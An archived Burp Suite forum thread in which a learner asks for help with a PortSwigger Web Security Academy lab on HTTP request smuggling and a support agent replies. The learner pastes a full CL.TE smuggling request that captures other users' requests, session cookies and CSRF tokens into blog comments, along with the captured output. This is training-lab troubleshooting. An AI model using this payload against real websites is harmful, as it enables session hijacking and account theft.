The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab Login Not Working

Nikhil | Last updated: Jul 08, 2020 11:04AM UTC

Lab: Exploiting HTTP request smuggling to capture other users' requests i GOt the session cookie and csrf too but i am not able to login session=IaHcO3qG7jv7aC03vFVa60keMi1kYNAG csrf=lE4qXBsfCxxqQVLqJk0kluRnPIQJ5N6 laburl https://acc41f821fa1258b805943df0028003a.web-security-academy.net/ What to do?

Hannah, PortSwigger Agent | Last updated: Jul 08, 2020 02:20PM UTC

Have you tried following along to a video solution? For example: https://youtu.be/lzpONjsQlXo

Nikhil | Last updated: Jul 08, 2020 02:39PM UTC

yeah same to same but that didn't work

Nikhil | Last updated: Jul 08, 2020 03:12PM UTC

i Tried Now I Can't even post comments through burp repeater. Please look into it

Nikhil | Last updated: Jul 09, 2020 05:41AM UTC

helloPOST / HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 520 Cookie: session=zB2ywbNIdngCwKnb9VDN1oh9cfEUBoU5 csrf=rX10ZHqdOj6WbiBu0FPeeuijWtRBjA3t Now my Own session cookie is in comment. Request:- POST / HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 500 Cookie: session=zB2ywbNIdngCwKnb9VDN1oh9cfEUBoU5 csrf=rX10ZHqdOj6WbiBu0FPeeuijWtRBjA3t&postId=3&name=Carlos+Montoya&email=carlos%40montoya.com&website=&comment=hello Please look into it

Nikhil | Last updated: Jul 09, 2020 05:42AM UTC

Carlos Montoya | 09 July 2020 helloGET / HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Ac Carlos Montoya | 09 July 2020 helloGET / HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Ac Carlos Montoya | 09 July 2020 helloGET / HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Ac And this is GET request in comment

Hannah, PortSwigger Agent | Last updated: Jul 09, 2020 10:15AM UTC

Hi. If you wait, the labs will reset after 15 minutes of inactivity. Keep trying! The labs can be very challenging, and this is an expert level lab.

Nikhil | Last updated: Jul 09, 2020 12:43PM UTC

Hi I have tried 2 times after your reply. Now lab is only reflecting my comment in plain text. Carlos Montoya | 09 July 2020 Hello Carlos Montoya | 09 July 2020 Hello Carlos Montoya | 09 July 2020 Hello Carlos Montoya | 09 July 2020 Hello Carlos Montoya | 09 July 2020 Hello Carlos Montoya | 09 July 2020 Hello Carlos Montoya | 09 July 2020 Hello Carlos Montoya | 09 July 2020 Hello Carlos Montoya | 09 July 2020 Hello Carlos Montoya | 09 July 2020 Hello Carlos Montoya | 09 July 2020 Hello Carlos Montoya | 09 July 2020 Hello Carlos Montoya | 09 July 2020 Hello

Hannah, PortSwigger Agent | Last updated: Jul 10, 2020 08:02AM UTC